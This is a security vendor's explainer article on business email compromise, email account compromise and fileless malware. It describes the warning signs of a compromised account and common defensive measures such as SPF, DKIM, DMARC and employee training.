Resources Hub - The Three Hardest Email Threats for Users to Detect

Over 90% of cyberattacks begin from an email. Given how often individuals and businesses utilize email, this percentage is scary. These attacks have cost organizations an average of $13 million in damages, which will continue to grow.

Businesses and users need to know how these attacks occur and better equip themselves to prevent future attacks. One employee could cost a company thousands with one wrong click. 

Phishing attacks and ransomware links embedded in company emails could cause havoc on, or even destroy,  a business. The result is legal fees, recovery costs, smudged reputations, and decreased productivity, with 60% of smaller companies closing after six months of an attack. There are numerous ways to combat these attacks, but as defenses advance, so do the threats. This article will discuss three of the most challenging email threats to detect and offer tips for identifying and avoiding said attacks. 

What Email Threats Are the Most Difficult to Detect?

Business Email Compromise (BEC)

Business email compromise, or BEC for short, is an internal attack on a company. Similar to phishing, BEC attacks attempt to bait a company employee by appearing to be someone of importance within the business. This could be an email that seems to be an executive trying to gain access or information on a system. Due to businesses' nature and high efficiency levels, these attacks take time to detect. If a co-worker is digging through hundreds of emails daily on top of their work, they might not notice minor inconsistencies in a fraudulent email. 

Email Account Compromise (EAC)

Email account compromise, or EAC for short, is a specific attack designed primarily to compromise an individual's inbox. This could be done via malware, phishing, or brute force attacks. The result is the attacker then uses the account to spread more phishing attacks to the contacts of the stolen inbox, gathering more and more personal information. This attack becomes extremely difficult to detect as these messages are technically sent from a legitimate account, but it is not the account's rightful owner. 

Fileless Malware 

Fileless malware attacks are email attacks stemming from a device's random access memory or RAM. They are not from a malicious file like ransomware or common malware but can still install and run fraudulent code on a system. They can be delivered via a phishing email and pose a threat to personal and private information. Fileless malware attacks are difficult to detect because they do not leave a trace. There is no signature (identification of files), so signature-based antivirus software cannot detect malicious content. 

What are the Signs That My Email Account Has Been Hacked?

It's important to note that detection methods and tools may vary, and consulting with cybersecurity professionals or using specialized security software to identify and mitigate fileless malware attacks is recommended for your email account. If you suspect your email account has been compromised, immediately change your password, enable two-factor authentication (if available), and contact your email service provider for further assistance.

Stay vigilant and skeptical when encountering suspicious emails or involving financial transactions. If you suspect a business email compromise, report it to your organization's IT department or reporting authority. Detecting these email threats is difficult, as mentioned above, but there are still methods you can use to spot them. Here are several tactics you can use to keep your accounts and your company safe:

Unexpected password changes or requests 

If you receive notifications or have trouble accessing your email account due to unexpected password changes, it could indicate your account has been compromised. If you receive unexpected password recovery or account verification requests for your email account, even though you did not initiate them, it might indicate account compromise attempts.

Unusual account or network activity 

Monitor your sent items, inbox, and trash folders for unusual or unauthorized emails. If you notice unfamiliar emails or emails sent without your knowledge, it may suggest that your account has been accessed by someone else. If you see repeated failed login attempts or unfamiliar IP addresses, it could indicate unauthorized access. 

Fileless malware often relies on network communication to carry out its malicious activities. Monitor your network traffic and look for sudden data transfer spikes or connections to suspicious IP addresses. Pay attention to any system alerts or notifications from your antivirus software that indicate suspicious activity related to your email account.

Changes in account settings 

Keep an eye on any modifications to your email account settings, such as changes in your signature, filters, or auto-responder settings. Unauthorized changes could be a sign of compromise.

Suspicious email forwarding 

Check your email settings to see if any unknown email addresses have been added for email forwarding. Cybercriminals often set up email forwarding to monitor and divert your incoming messages.

Unexpected emails or messages from contacts 

If your contacts report receiving unusual emails or messages from your account that you did not send, it could indicate that your account has been compromised and is being used to send spam or phishing messages.

Increased spam or phishing emails

Notice an influx of spam or phishing emails in your inbox? It could be a sign that your email account has been compromised and the attackers are using it to send malicious messages to your contacts.

Unusual email addresses 

BEC/EAC scammers often use email addresses that resemble legitimate addresses but have slight variations. Be cautious of emails from addresses that use a different domain or have misspellings or minor changes to the email address.

BEC scammers may also use personal email accounts instead of official company email addresses. Exercise caution when receiving business-related emails from personal accounts and verify authenticity before responding.

Unexpected requests for money transfers or sensitive information 

If you receive an email requesting money transfers, wire transfers, or sensitive information, especially from a high-level executive, verify the request through an alternate means of communication, such as a phone call. Scammers often impersonate company executives to trick employees into taking action.

Urgency and secrecy in communication

BEC scammers often create a sense of urgency, instructing employees to act quickly and keep the request confidential. Be cautious of emails that demand immediate action without proper verification or authentication.

Increased memory usage 

Fileless malware injects malicious code directly into the computer's memory. If you notice a significant increase in memory usage without any obvious explanation, it could be a sign of fileless malware.

Unusual behavior of legitimate processes

Fileless malware typically leverages legitimate processes or applications to execute malicious activities without leaving a trace on the file system. If you observe unusual behavior or performance issues with commonly used applications, it could be an indication of fileless malware. 

Fileless malware often utilizes legitimate scripting tools like PowerShell to execute commands and evade detection. Monitor the usage of scripting tools and investigate any suspicious or unauthorized activities.

Tips & Best Practices for Blocking Email Threats Before They Happen

There is a positive to all of these negatives. Numerous tactics can be deployed to reduce the risk of becoming a victim of these attacks. These attacks all have a common attribute: emails and email security should be taken seriously. Outsourcing email protection to a third party creates a mediator, making it harder and slower for malicious hackers to target a business. A cloud-based email security solution adds a critical layer of security to help protect sensitive information. Upper-level management will also benefit from training employees on the common types of attacks they should be on the lookout for. This will keep them safer and the company as a whole. 

Here are some tips and best practices for detecting and blocking email threats:

• Implement multi-layered security: Use a combination of technologies like spam filters, antivirus software, and email encryption to enhance your email security.
• Educate employees: Conduct regular security awareness training sessions to educate employees about email threats and standard phishing techniques. Teach them how to spot suspicious emails and what actions to take if they encounter a potential threat.
• Use robust email filtering: Enable spam filters and configure them to block emails from suspicious senders or with known malicious content. Ensure regular updates to the filtering rules to stay updated against emerging threats.
• Implement email authentication: Use technologies like Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication Reporting and Conformance (DMARC) to prevent email spoofing and ensure incoming emails are from valid sources.
• Monitor email traffic: Regularly monitor email traffic for any suspicious activity or anomalies indicating a potential threat. This can be done using a combination of automated tools and manual review.
• Enable URL and attachment scanning: Use email security solutions that automatically scan URLs and attachments in incoming emails for potential threats like malware or phishing links. Block or quarantine any suspicious content.
• Encourage reporting of suspicious emails: Create a culture where employees are encouraged to report any suspicious or phishing emails they receive. This allows your IT team to investigate and take appropriate actions.
• Implement email encryption: Protect sensitive information by implementing email encryption. This ensures that even if an email is intercepted, unauthorized individuals cannot read the contents.
• Regularly update software and systems: Keep your email servers, email clients, and related software updated with the latest patches and security updates. This helps in guarding against known vulnerabilities.
• Have a robust incident response plan: Develop an incident response plan that outlines the steps to be taken in the event of a successful email threat. This plan should include isolation, containment, investigation, and recovery steps.

Remember, no security measure is foolproof, so it's important to have a defense-in-depth approach and regularly update your security practices to stay one step ahead of evolving email threats.

Keep Learning About Email Threat Protection

There are many different types of attacks in the modern world of cybersecurity. BEC attacks make their move by appearing to be from inside the company. EAC attacks wish to gain control of a user's inbox and weaponize it. Fileless attacks eat at the RAM and leave no trace. These stealthy attacks loom in emails, and with proper protection and training, these issues can be avoided before they cause serious harm. Now more than ever, businesses need a strong email security strategy.

• Learn more about protecting your business from ransomware.
• Keeping the integrity of your email safe requires securing the cloud with spam filtering and enterprise-grade anti-spam services.
• Sign up for our weekly newsletter to get the latest updates on how to stay safe online.